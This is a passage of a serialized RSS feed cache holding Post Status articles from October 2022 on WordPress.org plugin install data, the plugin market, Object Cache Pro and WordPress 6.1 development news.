WordPress.org be understood, as a basis for reaching a solution? A consensus understanding seems to be emerging that the data is <em>not</em> open-source and community-owned. Uncommunicated expectations, misunderstandings, distrust, and even suspicion of malfeasance have arisen from the lack of a shared understanding about who owns what.</p>\n\n\n\n<div class=\"wp-block-embed__wrapper\">\n\n</div>\n<p>This article was published at Post Status — the community for WordPress professionals.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 14 Oct 2022 23:39:22 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:10:\"Dan Knauss\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:21;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:45:\"Post Status: Over, Under, Around, and Through\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"https://poststatus.com/?p=128124\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"https://poststatus.com/over-under-around-and-through/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:9517:\"<h2>WordPress Business News Roundup for the Week of October 3</h2>\n\n\n\n<div class=\"wp-container-3 wp-block-group eplus-wrapper has-theme-palette-2-color has-theme-palette-8-background-color has-text-color has-background\"><div class=\"wp-block-group__inner-container\"><div class=\"wp-block-post-excerpt\"><p class=\"wp-block-post-excerpt__excerpt\">This week <strong>Alex Denning</strong> (Ellipsis) draws on <strong>Iain Poulson</strong>&#8216;s historical, high-level plugin data at <strong>WP Trends</strong> to offer some thoughtful, somewhat contrary, but practical and grounded perspectives on the value of <strong>Active Install Data</strong>. At the <strong>WP Watercooler</strong> and elsewhere, a realization seems to be setting in that the data is <em>not</em> open source and <em>not</em> the property of the WordPress community. Like last week\'s episode of <strong>Post Status Draft</strong> with <strong>Katie Keith</strong> of <strong>Barn2 Plugins</strong>, <strong>Till Krüss</strong> (<strong>Object Cache Pro</strong>, <strong>Relay</strong>) offers a lot of lessons this week about less travelled paths to success in the plugin business even as a very small company or company of one. Performance, testing, and support are key, interrelated parts of Till\'s success and probably the most important ones to borrow in your own life and work if they resonate.  </p></div>\n\n\n<div class=\"wp-block-spacer eplus-wrapper\"></div>\n\n\n\n<p class=\"yoast-reading-time__wrapper\"><span class=\"yoast-reading-time__icon\"></span><span class=\"yoast-reading-time__spacer\"></span><span class=\"yoast-reading-time__descriptive-text\">Estimated reading time:  </span><span class=\"yoast-reading-time__reading-time\">3</span><span class=\"yoast-reading-time__time-unit\"> minutes</span></p>\n</div></div>\n\n\n\n<h2 id=\"h-why-the-wordpress-org-growth-charts-don-t-matter\"><a href=\"https://poststatus.com/active-install-charts-removed-from-plugin-repo/\">Why the WordPress.org Growth Charts Don\'t Matter</a></h2>\n\n\n\n<p class=\"has-drop-cap\"><strong>Alex Denning</strong> pointed out in the <strong>Ellipsis</strong> newsletter that in 2019-20, only four plugins entered the space and broke into the upper tiers. These were <strong>Site Kit</strong> for <strong>Google</strong>, <strong>Facebook</strong> for <strong>WooCommerce</strong>, <strong>Creative Mail for WordPress and WooCommerce</strong>, and <strong>Google Ads and Marketing</strong> by <strong>Kliken</strong>. Has the WordPress.org repository become a closed shop, a tapped-out ecosystem where the winners have taken all? Here are some suggestions about how to break in or changes that could be proposed to open and diversify the repository. Until that happens, do growth charts matter? (Expect an article from Alex on this soon.)</p>\n\n\n\n<h2><a href=\"https://poststatus.com/does-wordpress-org-data-belong-to-the-wordpress-community-should-it/\">Does WordPress.org Data Belong to the WordPress Community? Should It?</a></h2>\n\n\n\n<p class=\"has-drop-cap\">Today <strong>WP Watercooler</strong> sought <a href=\"https://wpwatercooler.com/wpwatercooler/ep432-solutions-to-the-active-growth-problem/\">Solutions to the Active Growth Problem</a>. They got one new detail from <strong>Otto</strong> about the decision to remove the active install charts: it was made months ago. How should the data collected by WordPress.org be understood, as a basis for reaching a solution? A consensus understanding seems to be emerging that the data is <em>not</em> open-source and community-owned. Uncommunicated expectations, misunderstandings, distrust, and even suspicion of malfeasance have arisen from the lack of a shared understanding about who owns what.</p>\n\n\n\n<h2>Quick Links</h2>\n\n\n\n<ul><li>The <strong>Ellipsis Weather Report</strong> has been updated and shows no change for WordPress\'s sub-baseline performance, but <strong>WooCommerce</strong> is seeing <a href=\"https://getellipsis.com/weather-report/\">its best growth since May</a>.</li><li><strong>Post Status Draft:</strong> The story of <strong>Barn2 Plugins</strong> and their products in the WooCommerce marketplace offer <a href=\"https://poststatus.com/going-from-agency-to-products-the-story-of-barn2/\">a lot of insight into some winning strategies</a>.</li><li><strong>Kevin Ohashi</strong> sees <strong>Drupal</strong> as <a href=\"https://www.drupal.org/project/usage/ctools\">a model for a community data solution</a> in WordPress: &#8220;I am in favor of just releasing all the data, whether it\'s to authors themselves or the whole community.&#8221; (<a href=\"https://poststatus.slack.com/archives/CHNM7Q7T8/p1665703515129299\">Post Status Slack</a>) Drupal.org has the raw data and charts for their equivalent core, plugin, and theme installs by version and date going back nine years — with exact figures.</li><li>Eric Karkovack asks, <a href=\"https://thewpminute.com/what-should-plugin-developers-expect-from-wordpress/\">What Should Plugin Developers Expect from WordPress</a>? A limited partnership. No obligation to help them make money. And reasons to focus on making their own way.</li></ul>\n\n\n\n<h2><a href=\"https://poststatus.com/till-kruss-on-object-cache-pro-wordpress-plugins-testing-and-performance/\">Till Krüss on Object Cache Pro, WordPress, Plugins, Testing, Performance, and the Solo Devpreneur Life  — Post Status Draft 126</a></h2>\n\n\n\n<p>This episode of <strong>Post Status Draft </strong>offers some fascinating lessons on winning in the WordPress space with a high performance, low support, well-tested, dual-market, mixed license, plugin+SaaS product. That\'s a mouthful but a quick way to describe the many facets of <strong>Till Krüss</strong>&#8216;s business built around <strong>Object Cache Pro</strong>, “a business class <strong>Redis</strong> object cache backend for WordPress.” OCP offers a unique and highly successful model for partnerships between a WordPress plugin product business and two valuable niche markets: hosting companies (B2B) for $1,950/month and anyone running WordPress sites at scale (D2C) for $95/month. <strong>Nexcess</strong> is <a href=\"https://www.nexcess.net/blog/nexcess-to-provide-premium-caching-to-all-customers-with-new-object-cache-pro-partnership/\">the latest host to adopt</a> OCP, which they announced earlier this week.</p>\n\n\n\n<p>Till’s particular niche is not for everyone, but some of his ideas and achievements are very portable. For one thing, what plugin owner has not felt the pain of an extraordinarily busy support forum? Till is up to (wait for it…) 10 <em>minutes</em> a day on support — which he aims to decrease to five minutes. How? End-to-end unit testing to ensure the highest code quality. It’s an idea that needs to become a reality and a habit in the third-party WordPress product ecosystem, Till believes — and I think he’s right about that.</p>\n\n\n\n<ul><li><a href=\"https://objectcache.pro/\" target=\"_blank\" rel=\"noreferrer noopener\">Object Cache Pro</a> is a (closed-source) commercial product that grew out of and is developed alongside <a href=\"https://wordpress.org/plugins/redis-cache/\">Redis Object Cache</a>. (100k+ installs on WordPress.org, numerous forks and stars on <a href=\"https://github.com/rhubarbgroup/redis-cache\">GitHub</a>.) <strong>Redis Object Cache</strong> is a fork of an unmaintained precursor <a href=\"https://ethitter.com/2014/04/redis-object-cache-plugin-available-for-download/\"><strong>Erick Hitter</strong></a> and <a href=\"https://ttmm.io/tech/ludicrous-speed-wordpress-caching-with-redis/\"><strong>Eric Mann</strong></a> launched <a href=\"https://poststatus.com/redis-object-cache-wordpress/\">in 2014</a>. </li><li><a href=\"https://relay.so/\" target=\"_blank\" rel=\"noreferrer noopener\">Relay</a> looks like it will be a successor to OCP as it\'s capable of speeds up to 100 times faster than Redis. It\'s a PHP extension developed in C that is both a Redis client and a shared in-memory cache.&#8221; There is a free Community version.</li><li><strong>Felipe Elia</strong> recently wrote a great explainer on&nbsp;<a href=\"https://felipeelia.dev/wordpress-object-cache-and-redis/\" target=\"_blank\" rel=\"noreferrer noopener\">WordPress, Object Cache, and Redis</a>. Felipe is right that understanding key performance concepts and tools should matter in developer interviews — so if you\'re hiring developers you might want to brush up with Felipe\'s article. </li><li><strong>Do the_Woo</strong> <a href=\"https://dothewoo.io/the-evolution-of-woocommerce-and-wordpress-hosting/\">recently recorded</a> a very insightful open discussion on the Future of Hosting (and WordPress plugin business opportunities) where Till, <strong>Carl Alexander</strong>, and <strong>Zach Stepek</strong> trade insights and stories from their work with enterprise class WordPress and WooCommerce.</li></ul>\n\n\n\n<div class=\"wp-container-4 wp-block-group has-theme-palette-8-background-color has-background\"><div class=\"wp-block-group__inner-container\">\n<p><strong>From the Post Status Archive:</strong> <a href=\"https://poststatus.com/scaling-wp-draft/\">Scaling WordPress</a> (<strong>Post Status Draft #51</strong>) remains one of our all-time most listened to podcast episodes, from 2016. <strong>Brian Krogsgard</strong> and <strong>Joe Hoyle</strong> took a pretty comprehensive look at WordPress performance and caching, including Redis.</p>\n</div></div>\n\n\n\n<p></p>\n\n\n\n<div class=\"wp-block-embed__wrapper\">\n\n</div>\n<p>This article was published at Post Status — the community for WordPress professionals.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 14 Oct 2022 22:08:43 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:10:\"Dan Knauss\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:22;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:100:\"Post Status: A Definitive Guide to WP-Config, the WordPress 6.1 Field Guide, and Twenty Twenty-Three\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"https://poststatus.com/?p=128099\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:109:\"https://poststatus.com/a-definitive-guide-to-wp-config-the-wordpress-6-1-field-guide-and-twenty-twenty-three/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4288:\"<h2 id=\"h-wordpress-design-development-around-the-web-for-the-week-of-october-10\">WordPress Design & Development Around the Web for the Week of October 10</h2>\n\n\n\n<div class=\"wp-container-7 wp-block-group eplus-wrapper has-theme-palette-2-color has-theme-palette-8-background-color has-text-color has-background\"><div class=\"wp-block-group__inner-container\"><div class=\"wp-block-post-excerpt\"><p class=\"wp-block-post-excerpt__excerpt\">Here’s a glimpse of what’s going on in the world of design and development in the WordPress space this past week: A delicious developer\'s advanced guide to <strong>WP-Config</strong>, the <strong>WordPress 6.1 Field Guide</strong>, and <strong>Twenty Twenty-Three</strong> looks amazing! <strong>Brian Gardner</strong> released a new <strong>FSE</strong> theme, <strong>Powder</strong>. Cool Tool of the Week: <strong>Lorem Picsum</strong> by <strong>David Marby</strong> and <strong>Nijiko Yonskai</strong>. </p></div>\n\n\n<div class=\"wp-block-spacer eplus-wrapper\"></div>\n\n\n\n<p class=\"yoast-reading-time__wrapper\"><span class=\"yoast-reading-time__icon\"></span><span class=\"yoast-reading-time__spacer\"></span><span class=\"yoast-reading-time__descriptive-text\">Estimated reading time:  </span><span class=\"yoast-reading-time__reading-time\">3</span><span class=\"yoast-reading-time__time-unit\"> minutes</span></p>\n</div></div>\n\n\n\n<h2>Serve Up a Delicious WP-Config</h2>\n\n\n\n<p>The folks at <strong>Delicious Brains</strong> have put out the ultimate&nbsp;<a href=\"https://deliciousbrains.com/developers-guide-to-wpconfig\" target=\"_blank\" rel=\"noreferrer noopener\">Developer’s Advanced Guide to the <code>wp-config.php</code> file</a>. I sure wish I had this years ago when I was starting out! Already found a few new tricks in here for this old dog to try out. Like did you know you could rotate keys/salts?!!?!</p>\n\n\n\n<h2>Keep This Guide Handy</h2>\n\n\n\n<p>I’ve been seeing a lot of buzz in <strong>Post Status Slack</strong> and on <strong>Twitter</strong> about <strong>WordPress 6.1</strong>, and for good reason! <strong>Milana Cap</strong> breaks down everything that is coming and what changes we can expect in the&nbsp;<a href=\"https://make.wordpress.org/core/2022/10/12/wordpress-6-1-field-guide/\" target=\"_blank\" rel=\"noreferrer noopener\">WordPress 6.1 Field Guide</a>. I’m very excited about the accessibility and performance improvements, but honestly everything looks really impressive!</p>\n\n\n\n<h2>Digesting Twenty Twenty-Three</h2>\n\n\n\n<p>Another major inclusion in 6.1 is going to be the new <strong>Twenty Twenty-Three</strong> theme with style variations, page layouts, fluid typography, and more.&nbsp;<strong>Kinsta</strong> gives us <a href=\"https://kinsta.com/blog/twenty-twenty-three-theme/\" target=\"_blank\" rel=\"noreferrer noopener\">a deep dive</a>&nbsp;into what all of the features are and how we can use them as developers.</p>\n\n\n\n<h2>Keep Your Powder DRY</h2>\n\n\n\n<p><strong>Brian Gardner</strong> released <em>another</em> amazing block theme for full-site editing with one-click layout patterns included. It\'s called <strong><a href=\"https://powder.design/\">Powder</a></strong> and is intended as a base for child themes and custom sites. <a href=\"https://powder.design/demo/\">Check out the demo</a>. Powder scores a perfect 100 in <strong>Google Pagespeed Insights</strong> for both mobile and desktop. <a href=\"https://github.com/bgardner/powder\">Get it on <strong>GitHub</strong></a>.</p>\n\n\n\n<div class=\"wp-container-8 wp-block-group has-theme-palette-8-background-color has-background\"><div class=\"wp-block-group__inner-container\">\n<h2>Cool Tool</h2>\n\n\n\n<p>Each week we feature one cool tool that can help make your life easier as a WordPress builder.</p>\n\n\n\n<h3>Lorem Picsum</h3>\n\n\n\n<p>When making a new site I’m always struggling for imagery.&nbsp;<a href=\"https://picsum.photos/\" target=\"_blank\" rel=\"noreferrer noopener\">This site</a>&nbsp;makes it so easy to plop in some photos and move on. It’s the <em>lorem ipsum</em> for photos, like literally! Thanks to <a href=\"https://dmarby.se\">David Marby</a> and <a href=\"https://github.com/Nijikokun\">Nijiko Yonskai</a> for gifting this to the world. </p>\n</div></div>\n<p>This article was published at Post Status — the community for WordPress professionals.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 14 Oct 2022 18:12:13 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:18:\"Daniel Schutzsmith\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:23;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:65:\"Post Status: Why the WordPress.org growth charts might not matter\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"https://poststatus.com/?p=127982\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:76:\"https://poststatus.com/why-the-wordpress-org-growth-charts-might-not-matter/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:6055:\"<div class=\"wp-container-11 wp-block-group eplus-wrapper has-theme-palette-2-color has-theme-palette-8-background-color has-text-color has-background\"><div class=\"wp-block-group__inner-container\"><div class=\"wp-block-post-excerpt\"><p class=\"wp-block-post-excerpt__excerpt\">In 2019-20, only four plugins entered the space and broke into the upper tiers. These were Site Kit for Google, Facebook for WooCommerce, Creative Mail for WordPress and WooCommerce, and Google Ads and Marketing by Kliken. Has the WordPress.org repository become a closed shop, a tapped-out ecosystem where the winners have taken all? Here are some suggestions about how to break in or changes that could be proposed to open and diversify the repository. Until that happens, do growth charts matter? </p></div>\n\n\n<div class=\"wp-block-spacer eplus-wrapper\"></div>\n\n\n\n<p class=\"yoast-reading-time__wrapper\"><span class=\"yoast-reading-time__icon\"></span><span class=\"yoast-reading-time__spacer\"></span><span class=\"yoast-reading-time__descriptive-text\">Estimated reading time:  </span><span class=\"yoast-reading-time__reading-time\">3</span><span class=\"yoast-reading-time__time-unit\"> minutes</span></p>\n</div></div>\n\n\n\n<h2>Why lament the loss of a declining statistic?</h2>\n\n\n\n<div class=\"wp-block-spacer\"></div>\n\n\n\n<p class=\"has-drop-cap\">Writing in the Ellipsis newsletter early this week, Alex Denning floated the idea that &#8220;WordPress.org growth charts might not matter.&#8221; Why? Alex writes:</p>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>Our experience is that freemium is an inefficient and ineffective channel for the average WordPress product.&nbsp;</p><p>You need very significant scale to make free a better marketing channel than the alternatives, and unless you already have that scale you’re probably not going to get it.&nbsp;</p></blockquote>\n\n\n\n<p>Alex also cited <strong>WP Trends</strong> <a href=\"https://s.wptrends.co/w/q7kbyKQdYMDinkrqezkjtg\">Q2 2022 data</a> on the number of free plugins <em>newly added each year</em> at wp.org with 100k-500k, 500k-1M, and 1M+ installs. Viewed over 15 years, the market peak appears to have been reached in 2014, although the middle and upper tiers have had a more level and wave pattern of ups and downs beneath the dramatic rise and fall of new 100k-500k install plugins, at least between 2007-16.</p>\n\n\n\n<h2>A &#8220;Closed Shop&#8221;</h2>\n\n\n\n<p>In 2019-20, only four plugins entered the space and broke into the upper tiers. These were Site Kit for Google, Facebook for WooCommerce, Creative Mail for WordPress and WooCommerce, and Google Ads and Marketing by Kliken.</p>\n\n\n\n<p>The 100-500K+ products are in a position to get their own customer data and analytics, so active install data from .org doesn\'t matter as much to them.</p>\n\n\n\n<img width=\"752\" height=\"373\" src=\"https://cdn.poststatus.com/wp-content/uploads/2022/10/image-752x373.png\" alt=\"\" class=\"has-transparency wp-image-127983\" /><strong>WP Trends</strong>, <a href=\"https://s.wptrends.co/w/q7kbyKQdYMDinkrqezkjtg\">June 2022</a>\n\n\n\n<h2>How is it Possible to Break In?</h2>\n\n\n\n<p>People looking to break into the market with a free product distributed on WordPress.org &#8220;have to do a phenomenal amount of work,&#8221; according to Alex:</p>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>You’ll need to have an incredible product, and then support it with a mix of content, SEO, social, partnerships, etc. You then have to convert those users at ~1-2% onto your paid offering.<br /><br />Given all the work you’re doing to get the free installs, and then to convert 1-2% of those free users to paid, you’re almost certainly going to have a better time going straight to paid, focusing all your efforts into activities that help people discover your product and immediately convert.</p></blockquote>\n\n\n\n<p>Alex describes the WP.org plugin repo as a &#8220;closed shop&#8221; now with a few exceptions that make sense as a freemium product: </p>\n\n\n\n<ul><li>Anything in a crowded category, like Forms.  </li><li>Anything that can leverage many marketing channels.</li><li>Anything that can leverage hosting partnerships.</li></ul>\n\n\n\n<p>There\'s also the WooCommerce market.</p>\n\n\n\n<img width=\"752\" height=\"316\" src=\"https://cdn.poststatus.com/wp-content/uploads/2022/10/Screen-Shot-2022-10-14-at-11.27.32-AM-752x316.jpg\" alt=\"\" class=\"not-transparent wp-image-128079\" />Ellipsis\' <a href=\"https://getellipsis.com/weather-report/\">Weather Report</a>\n\n\n\n<p>Largely based on search volume analysis, <a href=\"https://getellipsis.com/weather-report/\">Ellipsis\' 2022 &#8220;weather data&#8221;</a> within the larger climate systems of WordPress and WooCommerce indicate WordPress is struggling, but WooCommerce is showing its best growth since May.</p>\n\n\n\n<h2>Or, Change the System from Within?</h2>\n\n\n\n<p>If a more diverse and open ecosystem is preferred, Alex suggests the plugin repository\'s search algorithm needs to do more than reward plugins with high active install counts — like &#8220;a &#8216;rising star\' label.&#8221; He notes &#8220;this is a short-term commercial, rather than a long-term ecosystem view.&#8221;</p>\n\n\n\n<div class=\"wp-container-12 wp-block-group has-theme-palette-8-background-color has-background\"><div class=\"wp-block-group__inner-container\">\n<h2 id=\"h-what-might-a-long-term-ecosystem-view-look-like\">What might a long-term ecosystem view look like?</h2>\n\n\n\n<p>This week, Cory says <a href=\"https://poststatus.com/two-key-questions-we-need-to-answer/\">this is the conversation we need to have</a> and the two questions we need to answer. I see many paths forward in <a href=\"https://poststatus.com/till-kruss-on-object-cache-pro-wordpress-plugins-testing-and-performance/\">Till Krüss\'s successful model with Object Cache Pro</a>. Resonating with Alex\'s observations, Till\'s model suggests several areas of opportunity for developers and founders working in the WordPress plugin market today.</p>\n</div></div>\n\n\n\n<p></p>\n<p>This article was published at Post Status — the community for WordPress professionals.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 14 Oct 2022 17:42:06 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:10:\"Dan Knauss\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:24;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:48:\"Post Status: Two Key Questions We Need To Answer\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"https://poststatus.com/?p=126639\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:59:\"https://poststatus.com/two-key-questions-we-need-to-answer/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:5970:\"<div class=\"wp-container-15 wp-block-group eplus-wrapper has-theme-palette-2-color has-theme-palette-8-background-color has-text-color has-background\"><div class=\"wp-block-group__inner-container\"><div class=\"wp-block-post-excerpt\"><p class=\"wp-block-post-excerpt__excerpt\"><strong>What are the best things the WordPress community can do to better support plugin developers and founders?</strong> Recent discussions around the Active Install data being removed from WordPress.org forces us to respond to this question if we believe a healthy third-party plugin market is essential to WordPress, as I do. </p></div>\n\n\n<div class=\"wp-block-spacer eplus-wrapper\"></div>\n\n\n\n<p class=\"yoast-reading-time__wrapper\"><span class=\"yoast-reading-time__icon\"></span><span class=\"yoast-reading-time__spacer\"></span><span class=\"yoast-reading-time__descriptive-text\">Estimated reading time:  </span><span class=\"yoast-reading-time__reading-time\">3</span><span class=\"yoast-reading-time__time-unit\"> minutes</span></p>\n</div></div>\n\n\n\n<p class=\"has-drop-cap\">The recent discussions around the Active Installs data being removed from the WordPress Repo prompted two questions I think we need to answer as a bigger WP community and particularly our members at Post Status. </p>\n\n\n\n<p>As someone who lived in the WordPress product space for 10+ years and owned free and commercial plugins, I resonate with the issues and concerns being brought up today by plugin developers. (Here I am in 2010, writing <a href=\"https://corymiller.com/why-we-need-a-premium-wordpress-plugin-market/\">Why We Need a Premium WordPress Plugin Market</a>.)</p>\n\n\n\n<p>What I want to do here is frame the conversation to be constructive and help us all make progress together — for the good of WordPress, plugin developers, and our members. </p>\n\n\n\n<p>I\'ll try to offer as limited a commentary as I can here because I\'d like your comments and responses to these questions: </p>\n\n\n\n<h2 id=\"h-1-are-plugins-essential-to-wordpress\">1. Are plugins essential to WordPress?</h2>\n\n\n\n<p>Specifically, have (free and paid) plugins been — and will they continue to be — essential to the health and growth of WordPress? </p>\n\n\n\n<p>My answer is YES — <em>absolutely!</em> Even if it\'s a messy market. And we have work to do. </p>\n\n\n\n<p>As of this writing, there were listed 60,229 plugins in the WP repo, and of course countless other free and paid plugins elsewhere. </p>\n\n\n\n<p>Plugins are key contributions to WordPress. They extends WordPress and allows WP to stay as nimble as possible for the enormous variety of uses in our world. </p>\n\n\n\n<p>I started iThemes in 2008. We were early in the &#8220;premium&#8221; market. We didn\'t have to depend on the repo at the time, but I would have relished the opportunity to offer and sell our products there. </p>\n\n\n\n<p>If your answer to my first question is a solid <em>yes</em> too — and I hope it is — then my next question is:</p>\n\n\n\n<h2>2. What can we do to create a more sustainable model and environment for WP plugin developers?&nbsp;</h2>\n\n\n\n<p><strong>THIS</strong> is where we need to start the conversation, in my view. </p>\n\n\n\n<p>Merely suggesting to plugin developers committed to the WP.org repository that if they don\'t like the rules or changes they should go elsewhere isn\'t fair or reasonable to them. </p>\n\n\n\n<p>If you\'re saying that to plugin developers, but&#8230;</p>\n\n\n\n<ul><li>You don\'t own a free plugin&#8230;</li><li>You haven\'t built your business around a free plugin&#8230;</li><li>You were early into the product business like I was at iThemes in 2008&#8230;</li><li>You already have an existing platform outside of the .org repo&#8230;</li></ul>\n\n\n\n<p>&#8230;then at best, you\'re not putting yourself in their shoes. You\'re not offering realistic advice. </p>\n\n\n\n<p>I also don\'t think it\'s the best or healthiest answer for them or WordPress. </p>\n\n\n\n<p>What I\'m talking about and asking for are ideas that make incremental progress and improvement &#8230; TOGETHER. </p>\n\n\n\n<p>For WordPress and the plugin developer ecosystem to start a dialogue that is perhaps overdue. I also want to keep in mind that this is an open source project, with projects teams and volunteers who are already overloaded. </p>\n\n\n\n<p>I think we start with this question:</p>\n\n\n\n<blockquote class=\"wp-block-quote\"><p><strong>What are the big three things we as a larger WP community (together) can start working toward to support WP plugin devs better?</strong></p></blockquote>\n\n\n\n<p>I\'ll offer some ideas to kick off this conversation.</p>\n\n\n\n<h2>Let\'s agree we\'re all in this together. </h2>\n\n\n\n<p>There\'s so much division and polarization in our world already today outside of WP. In the spirit of open source and WP, let\'s be a shining example to our worlds of what can be when humans start talking and listening to fellow humans. Leaving some of our past behind and simply understanding where we\'re coming from. </p>\n\n\n\n<p>But at its simplest? <strong>Be open to the conversation. </strong></p>\n\n\n\n<p>At its best? <strong>Try to embody the other\'s perspective.</strong> Getting into their shoes. Seeing from their perspective. </p>\n\n\n\n<p>One of my favorite conversations this year was with <strong><a href=\"https://twitter.com/bph\">Birgit Pauli-Haack</a></strong> at WCUS. The topic was Core Contribution. We initially came at it from our separate sides. But then we started listening to each other. And now &#8230;. we\'re working together on some things we think will make a difference for ALL. </p>\n\n\n\n<p>If you know Birgit, you know she\'s a very special human in the world and we\'re privileged to have her in 